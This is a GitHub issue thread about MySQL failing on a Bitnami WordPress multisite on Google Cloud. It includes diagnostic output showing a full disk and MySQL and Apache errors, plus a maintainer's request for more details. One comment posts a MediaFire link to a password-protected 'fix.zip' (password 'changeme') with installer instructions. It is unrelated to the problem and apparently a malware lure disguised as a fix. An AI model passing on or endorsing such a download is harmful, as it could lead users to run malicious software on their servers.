### ISSUE TITLE
[<application>] <title>mysql not running on GCP bitnami multisites

### ISSUE THREAD

**Issue by mubiesam** [bitnami/vms#1639]
### Platform

Google Cloud Platform

### bndiagnostic ID [know more about bndiagnostic ID](https://docs.bitnami.com/general/how-to/understand-bndiagnostic/)

849fabe0-1246-1542-0000

### bndiagnostic output

architdz@bitnami-wordpressmultisite-4ae5:~$ sudo /opt/bitnami/bndiagnostic-tool
 
    ? Resources: Found possible issues
    ✓ Php: No issues found
    ✓ Connectivity: No issues found
    ? Mysql: Found possible issues
    ? Apache: Found possible issues
 

 
[Resources]

Your disk is almost full: You could try to increase your instance's storage.
```
Filesystem Size Used Avail Use% Mounted on /dev/sda1 30G 28G 11M 100% /
```
Please check your cloud provider's documentation for more information.

[Mysql]

Found recent error messages in the MySQL error log:
```
2024-08-27T15:12:38.107637Z 0 [ERROR] [MY-010119] [Server] Aborting

```
Please check the following guide to troubleshoot MySQL issues:
 
https://docs.bitnami.com/aws/apps/wordpress/troubleshooting/debug-errors-mysql/

The "/opt/bitnami/mysql/data" folder is using 53% of total disk space.
```
1       /opt/bitnami/mysql/data/#innodb_temp
2       /opt/bitnami/mysql/data/performance_schema
5627    /opt/bitnami/mysql/data/bitnami_wordpress
1       /opt/bitnami/mysql/data/mysql
1       /opt/bitnami/mysql/data/sys
16129   /opt/bitnami/mysql/data
```
In most cases this is due to binary logging. Please check the following guide to disable it.
 
https://docs.bitnami.com/general/apps/wordpress/troubleshooting/disable-binary-logging-mysql/

[Apache]

Found recent error or warning messages in the Apache error log.
```
[Tue Aug 27 14:22:24.439792 2024] [proxy_fcgi:error] [pid 2743:tid 140705087211264] [client 172.71.182.55:65234] AH01071: Got error 'PHP message: PHP Warning:  Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /opt/bitnami/apps/wordpress/htdocs/wp-includes/blocks/index.php on line 9PHP message: PHP Warning:  Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /opt/bitnami/apps/wordpress/htdocs/wp-includes/blocks/index.php on line 9PHP message: PHP Warning:  require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /opt/bitnami/apps/wordpress/htdocs/wp-includes/blocks/index.php on line 9PHP message: PHP Fatal error:  require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/bitnami/php/lib/php') in /opt/bitnami/apps/wordpress/htdocs/wp-includes/blocks/index.php on line 9'

[Tue Aug 27 14:32:42.952518 2024] [proxy_fcgi:error] [pid 3082:tid 140704940521216] [client 172.71.99.52:36792] AH01071: Got error 'Primary script unknown'

[Tue Aug 27 14:33:30.707081 2024] [proxy_fcgi:error] [pid 2743:tid 140704856594176] [client 172.71.102.9:48360] AH01071: Got error 'Primary script unknown'

```
Please check the following guide to troubleshoot server issues:
 
https://docs.bitnami.com/general/apps/wordpress/troubleshooting/debug-errors-apache/

A high number of incoming requests originate from one or more unique IP addresses. This could indicate a bot attack. The following guide shows how to check for and block suspicious IP addresses.
 
https://docs.bitnami.com/bch/apps/moodle/troubleshooting/deny-connections-bots-apache/
 
architdz@bitnami-wordpressmultisite-4ae5:~$ 

### bndiagnostic was not useful. Could you please tell us why?

can not find bndiagnostic ID

### Describe your issue as much as you can

Followed the instructions https://docs.bitnami.com/aws/apps/wordpress/administration/recover-database-mysql/
Recover a MySQL database
sudo tail -n 100 /opt/bitnami/mysql/logs/mysqld.log
tail: cannot open '/opt/bitnami/mysql/logs/mysqld.log' for reading: No such file or directory

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gongomgra** [comment]
Hi @mubiesam,

We could not download the bndiagnostic information with the code you shared. Can you run the tool again and share the new code with us? Apart from that, can you give us more information about your issue and which changes did you perform in your server before facing them?
